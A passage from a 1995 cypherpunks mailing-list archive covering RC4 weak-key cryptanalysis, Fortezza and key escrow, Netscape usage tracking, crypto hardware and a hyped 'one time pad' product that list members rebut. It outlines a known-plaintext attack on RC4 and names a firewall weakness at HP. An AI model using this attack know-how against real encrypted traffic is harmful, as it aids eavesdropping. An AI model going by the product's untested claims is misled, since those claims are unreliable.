the concepts of statistical mechanics and quantum thermodynamics.

To build a working apparatus (or software systems, as we are discussing 
here), the designer is typically faced with the breakdown of well-behaved 
mathematical models.  Everything from degenerate states to the "baked in" 
uncertainty of certain states tends to undermine the mathematical 
foundations of a theorist's constructions.  Of course the theoretical models 
are absolutely critical, but the designer must always caution themselves 
against drawing inferences without measurements and clearly stated 
rationales that speak to these physical realities that lead to mathematical 
weaknesses.  Ultimately, the probabilistic nature of such systems may be 
"moved around," but not removed from the model!

Since the real world of actual measurements interferes with essentially 
everything we claim to "know" about quantities such as entropy, the real 
danger is assigning an independent "meaning" to these constructs.  Why? 
 Because these quantities do not exist independently, they only exist with 
respect to our predictive models of a system's behavior.  So these models do 
not really "enumerate" anything about states, but rather restate the 
probability assumptions of the model in the form of a "working equation."

In addition, drawing inferences as to the behavior of systems based on 
common mathematical form is simply inviting trouble, even at the theoretical 
level.  Mathematical models are not the real world, and the superficial 
mathematical consistency between say, the functional form of a resonance in 
a quantum well and a marble in a bowl, does not mean that the marble gives 
any special insight into the nature of the quantum well.  In fact, beyond 
the curiosity of similar equations, the most important information is in the 
distinctions and clarifications (emanating from theory) between the systems 
from a practical, apparatus building, real world perspective (as contrasted 
with the "everything is just a special case of X" perspective).

This danger is also present in designs for sources of entropy to seed RNGs 
for random data or to create uniformly distributed keys.  Well designed 
models will avoid rephrasing assumptions as conclusions, and will explicitly 
address the mathematical weaknesses upon which the theoretical arguments in 
support of the model are ultimately based.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Roos <andrewr@vironix.co.za>
Date: Thu, 28 Sep 95 07:28:45 PDT
To: cypherpunks@toad.com
Subject: Cryptanalysis of RC4 - Preliminary Results
Message-ID: <9509281628.aa25754@herman.vironix.co.za>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi c'punks & sci.cryptites


About a week ago I posted a message about weak keys in RC4. This is 
an update on the results of my continued 4am sessions with RC4 and 
shows that certain weak keys lead to an almost-feasible known 
plaintext attack on the cipher (well, about as feasible as the 
differential attack on DES, shall we say).

The attack is based on two particularly interesting three-byte key 
prefixes which have a high probability of producing PRNG sequences
which start with a known two-byte sequence. The prefixes are:

1.  Keys starting with "00 00 FD" which have a 14% probability of 
    generating sequences which start "00 00".

2.  Keys starting with "03 FD FC" which have a 5% probability of
    generating sequences which start "FF 03".

Note that the expected frequency of any two-byte output sequence is 
1 in 65536 or about 0.0015%, so these key prefixes are highly 
unusual. I won't go into the reasons why in this post, since it 
follows the same reasoning as my last post, but these prefixes are
special in that they have a high probability of initializing the RC4 
state table in such a way that the first two generated bytes depend 
only on the first three entries in the state table.

This observation is the basis for a simple known-plaintext attack
which reduces the effective key space which you need to search to
have a 50% probability of discovering a key by about 11.2 bits. The 
down side is that you need "quite a few" known plaintexts to make the 
attack feasible. 

It works as follows:

1.  Collect a large number of known plaintexts (and hence known 
    generator sequences).

2.  Discard generator sequences which do not start with "00 00" or 
    "FF 03".

3.  For generator streams starting "00 00", search all keys which
    begin with "00 00 FD".

4.  For generator streams staring "FF 03", search all keys which
    begin with "03 FD FC".

5.  Keep going until you find a key :-)

Clearly this attack will only discover a small fraction of the keys.
However since most generator sequences are discarded without being 
searched, and for those which are searched the search is 2^24 smaller 
than would be required to search the entire keyspace, the number of 
trials required to determine a key is significantly lower than for 
brute force alone.

Enough of an intro, here are the relevant results. Forgive my 
simplistic approach to maths, I'm a philosopher-come-software 
developer, not a mathematician. I've run the relevant simulations 
with 40-bit, 64-bit, 80-bit and 128-bit key lengths, and with two
different PRNGs. For the sake of consistency with my earlier paper 
I'll use the figures gathered for 80-bit keys (this seems to be RSA's
preferred key length for RC4), but there are no significant 
differences for other key lengths. The PRNG used for these tests was 
L'Ecuyer's 32-bit combined linear congruential generator as described 
in "Applied Cryptography" p. 349.

(a) Out of one million trials, keys starting with "00 00 FD" 
    generated sequences starting "00 00" 138217 times, and keys 
    starting with "03 FD FC" generated output sequences starting "FF 
    03" 50490 times.

(b) Out of ten million trials, arbitrary pseudo-random keys generated
    sequences starting with "00 00" 446 times, and sequences starting
    with "FF 03" 146 times. (Note the abnormally high incidence of 
    "00 00"; the expected mean is 152.8).

Suppose we have the output stream generated by a randomly chosen key.
The chance that it will start with either "00 00" or "FF 03", and 
that we will therefore search it, is:

    (446 + 146) / 1e7 = 5.92e-5

The chance that it starts with "00 00" and was generated by a key 
starting with "00 00 FD", or that it starts with "FF 03" and was 
generated by a key starting "03 FD FC" - i.e. the chance that we will
search it and be rewarded for our efforts - is:

    (138217 + 50490)/(1e6 * 2^24) = 1.12e-8

The total number of plaintexts required for a 50% chance that we will
discover one of the keys is:

    log(0.5)/log(1 - 1.12e-8) = 61 900 000

Well I did say "quite a few" plaintexts would be necessary :-) 

And the number of plaintexts which you expect to search in order to 
find the "right" one is:

    61 900 000 * 5.92e-5 = 3665

Since the total key length is 80 bits, and we are "guessing" 24 of 
these, each search requires 2^56 trials. Hence the total number of 
trials for a 50% chance of discovering a key is:

    3665 * 2^56 = 2.64e20 = 2 ^ 67.8

Since brute search alone would require 2^79 trials for a 50% chance 
of determining the key, this reduces the number of trials by 2^11.2.

The results are essentially identical for all the key lengths I have
tried, and in each case reduce effective key length by about 11.2 
bits. So, for example, a 64-bit key would normally require 2^63 
trials for 50% chance of solution; this attack reduces the number of
trials to 2^51.8 at the cost of requiring 62 million known plaintexts.

I'm still running simulations to check my maths, and although initial
results are encouraging, I don't have enough data for it to be
statistically relevant yet (generating all these sets of 62 million 
known streams takes time...) So consider this preliminary (again),
and I'll post the results of my simulations when I have enough 
data.


Andrew

________________________________________________________________
Andrew Roos <andrewr@vironix.co.za>

// C++ programmers have class (but not much inheritance)

PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26
Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGrlfmatuqa4OR+lAQF1eQP+IBBmSztAYUpq1q/BjzvYDCbb+Ns0Gi1S
u9wTaZOCl32fdp7NSUEQBX39nVJkQZginug56BZXzijRvOx6fl4+z7dmW9jwtE5E
YNCOhx+/fHX4psszMyEUTrnza7MYDc4HXlgv743LOD/xvEyU0D5OGgB5fg+lyhAK
6xQ/Zy8JpE8=
=BdMn
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Thu, 28 Sep 95 13:44:09 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
In-Reply-To: <199509281309.JAA12017@bwh.harvard.edu>
Message-ID: <199509282054.QAA26219@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>This came across the SSL mailing list.  Anyone know Taher's position
>on key-escrow?

Oh, come on.  One does not have to "support key escrow" to be interested
in Fortezza.  The Fortezza interface does not have any "escrow-specific"
features; it's actually a pretty good crypto API (for which several vendors
plan to produce compliant, non-escrowed PCMCIA cards).  The Fortezza market
(in the government) is also pretty big, by the way, so one can hardly
blame any vendor for being interested in in.

Disclaimer: I'm also an evil "Fortezza sympathizer".  I built a (Tessera,
actually) version of CFS last year.  I think it's a good interface,
and I'd encourage people to  build strong, non-escrowed crypto modules
(in hardware and in software) that conform to it...

-matt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@robo.remailer
Date: Thu, 28 Sep 95 17:09:31 PDT
To: cypherpunks@toad.com
Subject: Re: "Notes" to be Eclipsed by "Netscape"
In-Reply-To: <Pine.HPP.3.91.950928205053.16699C-100000@cor.sos.sll.se>
Message-ID: <199509290004.RAA28740@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In an interview today in a Stockholm paper with a technical spokes-
> person for Hewlett-Packard (about the HP internal net with 19
> worldwide connections to the Internet - by the way, allegedly
> no one has ever succeeded in breaking their firewalls) it was

	"allegedly". Well I suppose you don't need to break the HP
firewall to get past it, so I guess that could be an appropriate
statement.
	(I adminned a few of their firewalls for a short time on
contract while the person who was normally in charge of them was
away. Calling it a firewall is a stretch of the word-- They allow
telnets from sites at berkeley.edu and stanford.edu with reusable
passwords, for one example.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 28 Sep 95 17:19:04 PDT
To: cypherpunks
Subject: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <9509290018.AA08111@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded-by: gordoni@base.com (Gordon Irlam)

Thought you might find this interesting.  I don't know if you have
thought about it or not, but control over the root name service plus
some funky software is all that it takes to be able to selectively snoop
on all the packets addressed to any host on the net.  DNS is currently
the achilles heel of a secure internet...

                                                     gordoni

From:  Wes Thomas <wes@ora.com>

The press recently reported that the National Science Foundation has turned
over Internet Domain Name registration to Network Solutions, Inc. (NSI) of
Herndon, VA. The press failed to note some interesting connections.

Tomorrow morning (Sept. 26), Web Review, a biweekly online magazine (see
Special Report at http://gnn.com/wr/) will reveal that NSI was purchased in
May by Scientific Applications International Corporation (SAIC) of San
Diego. SAIC is a $2 billion company indicted by the Justice Department on
ten felony counts for fraud in managing a Superfund toxic cleanup site (SAIC
pleaded guilty) and sued by the Justice Department for civil fraud on an
F-15 fighter contract.

SAIC's board members include Admiral Bobby Inman, former NSA head and deputy
director of the CIA; Melvin Laird, Nixon's defense secretary; and retired
General Max Thurman, commander of the Panama Invasion. Recently departed
board members include Robert Gates, former CIA director; William Perry,
current Secretary of Defense; and John Deutch, the current CIA director.
Current SAIC government contracts include re-engineering information systems
at the Pentagon, automation of the FBI's computerized fingerprint
identification system, and building a national criminal history information
system.

"At the very time the Internet community is struggling with the issues of
encryption and privacy, I'm more than a little uneasy to find this bunch of
ex-spooks sitting at the very entry point of the Net," says Jim Warren (a
leading activist in making government records accessible) in the article,
which was written by investigative journalist Stephen Pizzo, Web Review
Senior Editor and co-author of the book Inside Job, an expose on the savings
& loan looting.

Web Review is produced by Songline Studios, an affiliate of O'Reilly &
Associates.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 28 Sep 95 15:26:57 PDT
To: cjl <cjl@welchlink.welch.jhu.edu>
Subject: Re: awards for hacking microsoft
Message-ID: <9509282225.AA04018@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  What else, Chaum's Digicash.  If you are unwilling to part with
>  any of your own, perhaps you can collect contributions, or maybe
>  the Digicash people will pony-up some extra cyberbucks for a good
>  cause.  After all, they are worth the paper they're printed on.
>  :-)

Don't tell that to the people on the ECM mailing list!  People there have  
been trading cyberbucks for RealMoney.  The last successful trade I saw was  
100 cyberbucks for 4 UK pounds...

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 28 Sep 95 17:51:04 PDT
To: cypherpunks@toad.com
Subject: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID: <v02120d16ac90fe1bdb12@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



[Tim May writes about why crypto h/w acceleration using DSPs,
and DSPs in general, are likely doomed niche markets.]

I pretty much agree with Tim, except it's important to realize
that a for a _server_ that is doing a lot of RSA operations, the
difference between a 3.2 second encryption and a 1.9 second
encryption is significant. Peak transaction volume for any
public key-based payment system is going to be a factor of how many
RSA ops you can do per second.

It seems clear though that what's desired for this scenario is
good, dedicated hardware based on ASICs. I've been trying to buy
a sample board from Uti-Maco in Belgium, which looks ideal for
this sort of thing, but have finally given up in the face of
communications problems, their fear of RSA Labs, new Belgian
export controls they haven't tried to work with yet, and their
belief that I need a US crypto import license, which I can't persuade
anyone to admit _exists_.

Anyhow, for personal use, the only dedicated hardware we're likely
to see will not be focused on speed, but rather on security. Stuff
like the various PCMCIA cards from Nat Semi and Telequip, the
"decoder rings" and "decoder keychain do-dads" and so forth that
have security and conveniece benefits.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Thu, 28 Sep 95 14:57:39 PDT
To: cypherpunks@toad.com
Subject: NPR reports on Digital Express Secure Telephone
Message-ID: <199509282157.RAA23858@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Digital Express coverage on NPR.  Seastrom and Shiller(sp?) talking
over a powerbook using PGPPhone.  Demonstrating secure telephones!

Edward Appel, director of counterintelligence FBI representative on
National Security Council is quoted.  "It's very easy for a criminal
or a terrorist of a spy to use this for their advantage."

Reporter "You can connect to an MIT computer and get pgp-phone, you
have 

MIT Press 900 page book from PGP!  "You can carry that book with you,
anywhere you want in the world... Export control laws don't cover
books..."

Hal Abelson, MIT advisor to MIT press, etc, etc, ...

Appel "It's clearly not some weird form of poetry.  It is source code,
it is a program, ... if you can use it to tell the computer what to do
then it is part of the machine itself..."

The authors of PGP say "The real threat is that this technology is not
distributed widely enough..."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 28 Sep 95 18:43:51 PDT
To: cypherpunks@toad.com
Subject: Re: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: <199509290031.TAA24720@lab21.eng.auburn.edu>
Message-ID: <199509290143.SAA19419@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Doug Hughes <Doug.Hughes@Eng.Auburn.EDU> writes:
> you are really worried about security. This initial transaction serves
> as a seed for subsequent transactions. All subsequent transactions
> depend on preceding transactions. A degree of randomness comes from the
> randomness of the messages. Each next word in the message is random.

> After the initial exchange every message sent subsequently gets randomized
> from the previous randomness of the messages plus something in the table.

OK, you expected this, but here goes anyway.  This isn't a one time pad
because the "randomness" isn't really random -- it depends on a bunch of
plaintext.  Technically from your description this looks like a plaintext
autokey system.  A true OTP requires honest to goodness physically random
key material for the pad.  It may be quite strong, but it just doesn't
fit the definition.

Sigh.

People keep throwing OTP around because it's the only known perfect system --
until we get quantum crypto, I suppose -- but few companies actually want to
go to the trouble to implement the real thing.  And with good reason -- it's
a nuisance to do secure exchanges on the keying material.

	Jim Gillogly
	Sterday, 8 Winterfilth S.R. 1995, 01:41




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 28 Sep 95 16:26:20 PDT
To: cypherpunks@toad.com
Subject: VISA and Microsoft STT Specs available
Message-ID: <9509282326.AA25864@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

	The specs for STT are now available. Due to various circumstances
too complex to explain these are currently being served via the W3C web server 
at :-

http://www.w3.org/hypertext/WWW/Payments/STT.html

This does not constitute an endorsement of these specifications by W3C nor
any representation of the fitness thereof. 

Note that these documents may well move in the future.


For more payments related info see:-

http://www.w3.org/hypertext/WWW/Payments/

The roadmap has been updated appropriately.


		Phill Hallam-Baker



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 28 Sep 95 17:31:18 PDT
To: cypherpunks@toad.com
Subject: worldwide announce: New OTP Mail/FTP apps
Message-ID: <199509290031.TAA24720@lab21.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



A company in Israel named Elementrix has just announce at Interop an
entirely new paradigm in secure transactions. They have a secure
one time pad that allows people to exchange mail and ftp files back
in forth in complete security without the worries of key management
or storage or secure random number generation or synchronization.

In the words of Winn Schwartau: "This really fucks with your brain"

Both he and David Kahn have gotten information out of non-disclosure, as
well as several other un-named experts in cryptography about the nature
of this new development. They were astounded and have provided assurances
as to its authenticity and ability to work as advertised. So far they
have no released the complete protocol, but plan to do so as soon as
the Patent issues pending in several countries have been resolved. The
protocol will be completely published and subject to scrutiny by 
everybody. 
 To me it looks like it would be trivial for them to integrate it into
any and all kinds of browsers, clients and applications. Of course, I do
not have a complete knowledge of the entire protocol, but the brief
overview was simple enough to understand in concept. If it can work in
FTP, it can surely work in telnet as well, it's just a different front
end over a TCP/IP connection.
 I realize that there will be those out there on this list who will
immediately dismiss this as a hoax, as would have I had I not seen
it operate with my own eyes, and sat through the conference. It was
a case of serendipity for me, showing up at the booth and getting an
invite to the press conference on the one day I decided to attend 
Networld/Interop. 

 It works something like this: (I may not have it completely right, but
this is what I understood of the broken English of the man without
the microphone)

 A third party generates random numbers, or one of the two communicating
parties. The numbers do not have to be secret. There is also a published
table of mappings..
 Something like, a number, and an operation..

1 -> add 23
2 -> add 21
3 -> add 40
4 -> add 57
90 -> sub 23

 One initial connection is all that is needed to have a secure connection
for the lifetime of the two communicating parties. This initial connection
can be accomplished via any number of ways. It does involve an initial
one time only shared secret. This is much different than the many shared
secrets and key management issues of private and public key systems. 
For the initial connection you can stick the machines back to back if
you are really worried about security. This initial transaction serves
as a seed for subsequent transactions. All subsequent transactions
depend on preceding transactions. A degree of randomness comes from the
randomness of the messages. Each next word in the message is random.  

(the argument goes like this: If you already know what the next word in
the message is, there is no point in sending the message in the first
place, because you know what all the words in the message are.) This
imparts some degree of randomness, as no two beings will have an entire
conversation over their lives the same as their conversation with anybody
else: similar arguments can be applied to file transfers.

 After the initial exchange every message sent subsequently gets randomized
from the previous randomness of the messages plus something in the table.
If somebody else makes an exact copy of your machine, and sends a message
as you, then you can no longer send messages to the other party as you
are out of sync, and an Intruder alert is flagged if you do try to send
a message. Then you and the foreign party can resynchronize. This new state
is the basis for new messages.
 Argument: "That's fine, but how to I communicate securely with someone
over the Internet with email that I'm not able to setup a secure channel
with."
 Apparently each distribution disk is encoded with a unique ID and some
kind of unique (and as yet undisclosed table and algorithm). This table
allows the two parties to somehow setup a secure session and send mail.
This does not solve authentication problems. If somebody steals your
disk and sends mail to someone, they can appear to be you (or anybody).
However, the minute you try to send mail to that same person, there is
state on the remote machine with the imposter that you do not possess
that flags an intruder problem, and new negotiations can begin.
However, snoopers of the original message will still be unable to
decode the one time pad.

 Winn Schwartau and Dr. David Karn have both signed non-disclosure and
both made announcements to the affect that it does work as advertised.
Also, it is not strictly random numbers in the traditional sense. It relies
on the fact that the message is composed of a random series of words to
create the one time pad. However, the one time pad does not repeat itself
due to the continuing diversity of subsequent messages. They have reviewed
the math and the algorithms and stated that it's a completely new way
to think about cryptography, and the math is valid.

 Usability:  point and click.. Click on the little lock button and
the message is encrypted on the fly. The mail browser decrypts the
message on the fly. After it is decrypted it is stored on the hard
drive in plain text. (As it would have to be, unless you encrypt
it with some conventional secret-key algorithm like DES or IDEA).
This is fine as they say you have to have some degree of physical
security anyway, and this is only to protect you on the networks
in between the two machines. I'm inclined to agree.


Notes: 
It's fast!! 
I'm just telling you what I heard.
I have no idea how or what is stored as state information if anything.
(part of the currently undisclosed algorithm).
I was very skeptical at first, but have affected cautious optimism at this
point. (until it is published).

 
I just have a couple things to add. If it's true and works as advertised, we're
in for a real treat, and the NSA and FBI are going to be really upset. :)

Those drug smugglers and kiddie porn pushers are going to be immune
to network wire taps.  Next step: illegal algorithms, illegal XOR. ;)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Sep 95 19:33:21 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID: <ac90a93404021004b7de@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:49 AM 9/29/95, Douglas Barnes wrote:
>[Tim May writes about why crypto h/w acceleration using DSPs,
>and DSPs in general, are likely doomed niche markets.]
>
>I pretty much agree with Tim, except it's important to realize
>that a for a _server_ that is doing a lot of RSA operations, the
>difference between a 3.2 second encryption and a 1.9 second
>encryption is significant. Peak transaction volume for any
>public key-based payment system is going to be a factor of how many
>RSA ops you can do per second.

I don't disagree with Doug about this. But I don't think there are many
"server" systems running a lot of RSA at this point...for most of us, the
amount of RSA (or PGP, IDEA, DES, etc.) computation is a tiny fraction of
the total computons consumed running screen savers.

I'm just not convinced I'll soon invest in a company offering RSA acceleration.

(I recall seeing articles about specialized modular exponentiation hardware
in 1988, and Cylink was offering several such chips. I've yet to see any
commercial boards, for reasonable prices. And I'm willing to be that no
more than 3 members of our list would buy such a board, even if the hooks
were in place to let PGP, RSAREF, etc. use it. Just a hunch.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Thu, 28 Sep 95 17:57:57 PDT
To: Doug.Hughes@Eng.Auburn.EDU (Doug Hughes)
Subject: Re: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: <199509290031.TAA24720@lab21.eng.auburn.edu>
Message-ID: <199509282349.TAA00187@hoopsnake.cjs.net>
MIME-Version: 1.0
Content-Type: text


> One initial connection is all that is needed to have a secure
> connection for the lifetime of the two communicating parties. This
> initial connection can be accomplished via any number of ways. It
> does involve an initial one time only shared secret. This is much
> different than the many shared secrets and key management issues of
> private and public key systems.  For the initial connection you can
> stick the machines back to back if you are really worried about
> security. This initial transaction serves as a seed for subsequent
> transactions. All subsequent transactions depend on preceding
> transactions. A degree of randomness comes from the randomness of
> the messages. Each next word in the message is random.

I'm a little new to this, but I thought the whole idea behind keys was
not having to whisper "secrets" to someone on the other side of a
crowded mall. Most people don't have the luxary of connecting their
computers back to back with someone on the other side of the world
just to ensure a secure communications path. Ther would have to be
some mechnisms to ensure that secure delivery of your "secret", and
that brings us back to key management, so the whole thing is rather
self defeating.

Christopher



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Thu, 28 Sep 95 12:37:29 PDT
To: cypherpunks@toad.com
Subject: Anon Http web Proxy V2.1
Message-ID: <9509281922.AA18715@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



I fixed the IOs, it now works a lot faster,
play with it on 
  http://hplyot.obspm.fr:6661/  (no abuse plz)
and get the source package on 
  ftp://hplyot.obspm.fr/tcl/www/tclhttpdsh-0.4beta.tgz


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

smuggle FSF terrorist $400 million in gold nuclear Serbian Clinton




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: csmyth@blaze.cs.jhu.edu (Chris Smyth)
Date: Thu, 28 Sep 95 17:27:07 PDT
To: cypherpunks@toad.com
Subject: Netscape and privacy
Message-ID: <9509290026.AA08282@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The Communications Week issue of September 25 1995 contains an interesting
interview with Netscape Chairman Jim Clark in which he outlines the future
that he envisions for his company. The interview also contains a passage
discussing the Netscape browser software that I find somewhat disturbing.
Many cypherpunk list members are concerned with the general issue of
electronic privacy and with the programming of WWW browsers, so I think this
post is relevant to the list. Clark's apparent attitude toward privacy makes
me uneasy.

Begin excerpt

Comm Week: How do you track usage?

Clark: We have worked out schemes to tell us when you use our program and
for how long you use it. That capability is easy to add. We can tell each
and every time you turn it on and we can tell whether you have paid for it
or not. We were getting 10 million hits a day at our Web site.  It has
doubled since our IPO.

End excerpt

I personally oppose the collection of this type of behavioral tracking
information without my explicit consent, and I would reconsider using
software which implements the type of tracking Clark mentions above.  Note,
Clark's reply is ambiguous because it does not indicate if the `schemes'
have been implemented or deployed at this time.  Some list member associated
with Netscape may wish to clarify Clark's comments.  

It is true that a user automatically contacts the Netscape Web cite when
starting the browser if he or she has not reset the default home page.  I
reset my home page long ago, but I do not know if the Netscape site is still
contacted anyway.  Nor do I know if Netscape is contacted when I quit the
browser, or if elapsed usage time is tracked.

The future Clark posits for his corporation depends on people adopting
Netscape software for a wide variety of tasks. He wants the browser to
evolve toward being a general multimedia web browser, mail handler,
newsreader, and collaboration tool.  Such a tool would handle large amounts
of private and/or proprietary information and the creator of such a tool
must be extremely sensitive to privacy concerns in my opinion.  Collecting
and relaying information about usage is potentially a significant violation
of the privacy users will expect.

Certainly, it is tempting to gather information for marketing purposes and
other reasons.  For example, some browser company unconcerned about privacy
might program its browser to regularly transmit information about bookmarks
and histories to a database site for analysis and data-mining.  But ignoring
privacy concerns risks invoking the fervent ill-will of many users.  Perhaps
I am over-reacting to Clark's comments.  Even if I am over-reacting,
Netscape should consider developing a statement of its privacy policy and
making it available at its web site.

It is not easy to craft clear, concise and general privacy guidelines.
Below are two crudely crafted suggestions for properties that should be
satisfied by a browser.

1) Information about browser usage will never be collected and/or transmitted
surreptitiously to any other agent on the net.

2) Transfer of information should be done openly with the explicit
initiation/agreement of the browser user.

Note, currently the Netscape browser (and other browsers) apparently transmit
identification information such as the browser type, version number, and
machine name when making a connection.  The browser user should probably be
told about this information in my opinion.
                Chris Smyth csmyth@blaze.cs.jhu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 28 Sep 95 13:17:48 PDT
To: cypherpunks@toad.com
Subject: RE: "Notes" to be Eclipsed by "Netscape"
In-Reply-To: <01BA8CD0.30988CA0@ploshin.tiac.net>
Message-ID: <Pine.HPP.3.91.950928205053.16699C-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Pete Loshin wrote:

> >Timothy C. May wrote:

> >(I've been saying for a while that the Web serves that purpose better, and
> >that Web browsers will likely edge out Notes. Apparently I was hardly
> >prescient, as Netscape recently bought Collabra, which is pushing that
> >point exactly.)
> 
> Notes uses replication to distribute data across networks;
> there are better ways to have people compute remotely in my opinion
> too (not sure WWW is THE answer, but it certainly is one of them).

In an interview today in a Stockholm paper with a technical spokes-
person for Hewlett-Packard (about the HP internal net with 19
worldwide connections to the Internet - by the way, allegedly
no one has ever succeeded in breaking their firewalls) it was
stated that Netscape was heavily used for HP internal business.
Apparantly there was a choice between Notes and the internal
Web, the Web being favoured 470:1.

Mats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Thu, 28 Sep 95 19:40:22 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: GSSAPI compliant Apps
Message-ID: <Pine.A32.3.91.950928205746.26830B-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm interested in writing a GSSAPI compliant app, but I have been so far 
unsucessful in finding an example of GSSAPI compliant code to use as a 
baseline.

Does anyone have any pointers?

Thanks
Ben.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMGtcgL5ALmeTVXAJAQElIQL+JzyPIvta+NRiU6id45o557kvaxGvti4A
cREqsyn1oJPXS44GW9/RzdzJMjN7ofnMKqNt/TbKGgMni+XYCc/OAxLauDoKl8vm
4v/tTtfgVWGoS1jEB03SAB7Z2U49HxWv
=35YV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Thu, 28 Sep 95 15:58:07 PDT
To: cypherpunks@toad.com
Subject: Re: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
In-Reply-To: <199509281309.JAA12017@bwh.harvard.edu>
Message-ID: <44f98a$mu5@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509281309.JAA12017@bwh.harvard.edu>, adam@bwh.harvard.edu (Adam Shostack) writes:
> This came across the SSL mailing list.  Anyone know Taher's position
> on key-escrow?

  Just because we may do fortezza support for customers who want it
does not mean that we will force key escrow on the rest of the world.
I for one am against any kind of GAK on moral grounds.  I also think
that trying to implement mandatory GAK in a software only system
would be a nightmare.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 28 Sep 95 23:04:10 PDT
To: cypherpunks@toad.com
Subject: Re: Ray Cromwell: Another Netscape Bug (and possible security (fwd)
Message-ID: <199509290559.WAA24563@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
From owner-bugtraq@crimelab.com  Thu Sep 28 19:58:59 1995
Approved-By: CHASIN@CRIMELAB.COM
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Approved-By:  Neil Woods <neil@LEGLESS.DEMON.CO.UK>
Message-ID:  <199509280324.EAA19959@legless.demon.co.uk>
Date:         Thu, 28 Sep 1995 04:24:06 +0100
Reply-To: Bugtraq List <BUGTRAQ@crimelab.com>
Sender: Bugtraq List <BUGTRAQ@crimelab.com>
From: Neil Woods <neil@legless.demon.co.uk>
Subject:      Re: Ray Cromwell: Another Netscape Bug (and possible security
X-To:         BUGTRAQ@CRIMELAB.COM
X-cc:         8lgm@bagpuss.demon.co.uk
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@crimelab.com>
